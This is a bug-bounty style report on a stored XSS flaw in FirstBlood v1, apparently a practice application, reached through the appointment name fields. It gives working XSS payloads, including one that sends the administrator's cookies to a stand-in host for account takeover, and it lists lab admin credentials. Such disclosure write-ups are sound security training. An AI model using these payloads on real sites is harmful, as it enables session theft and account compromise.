FirstBlood-#201 — Stored XSS on /drpanel/drapi/query.php
This issue was discovered on FirstBlood v1
On 2021-05-11, 0xblackbird Level 5 reported:
Hi! I found another stored cross-site scripting issue but this time it's on /drpanel/drapi/query.php?aptid={ID}
.
Update
The payload works on every browser, on Firefox it needs a tab change or a click. But on Chrome (Brave browser), it worked right away for me. No user interaction needed.
Steps to reproduce
- Visit
/book-appointment.html
and fill in the required details except the first name and last name fields. On these fields, paste in the following payload: <xss/id="1"/tabindex="1"/autofocus/onfocusin="confirm%600%60">
.
- Now, simply login using the administrator account by using the following credentials:
drAdmin:s2Wpx5zfUvlSZhspJ
.
- On the dashboard, inspect the last appointment and copy the ID.
- Navigate to
/drpanel/drapi/query.php?aptid={ID}
, xss should trigger.
- This is just a simple xss, we can go for account takeover by stealing cookies. Repeat the above steps, only on the first step, change the payload to the following payload:
<xss/id="1"/tabindex="1"/autofocus/onfocusin="window.location.href='http://localhost/'%2bdocument.cookie">
- When we now visit
/drpanel/drapi/query.php?aptid={ID}
, we get redirected to http://localhost/${cookies}
This cookie can later be retrieved by the attacker and by that, fully compromise an administrator account.
Impact
Taking over an account with higher privileges is possible by stealing the cookies. This is because we could execute javascript on the administrator's behalf.
Background
I already had success with custom html tags, that gave me the idea to go for custom tags again. It also worked this time so it's probably a site-wide xss filter issue. Thanks for the fun and realistic challenge! I really like these!
Kind regards,
0xblackbird
P2 High
Endpoint: /drpanel/drapi/query.php?aptid={ID}
Parameter: fname, lname
Payload: <xss/id="1"/tabindex="1"/autofocus/onfocusin="confirm`0`">
FirstBlood ID: 10
Vulnerability Type: Stored XSS
When creating an appointment, it is possible to get stored XSS /drapi/query.php via the patients name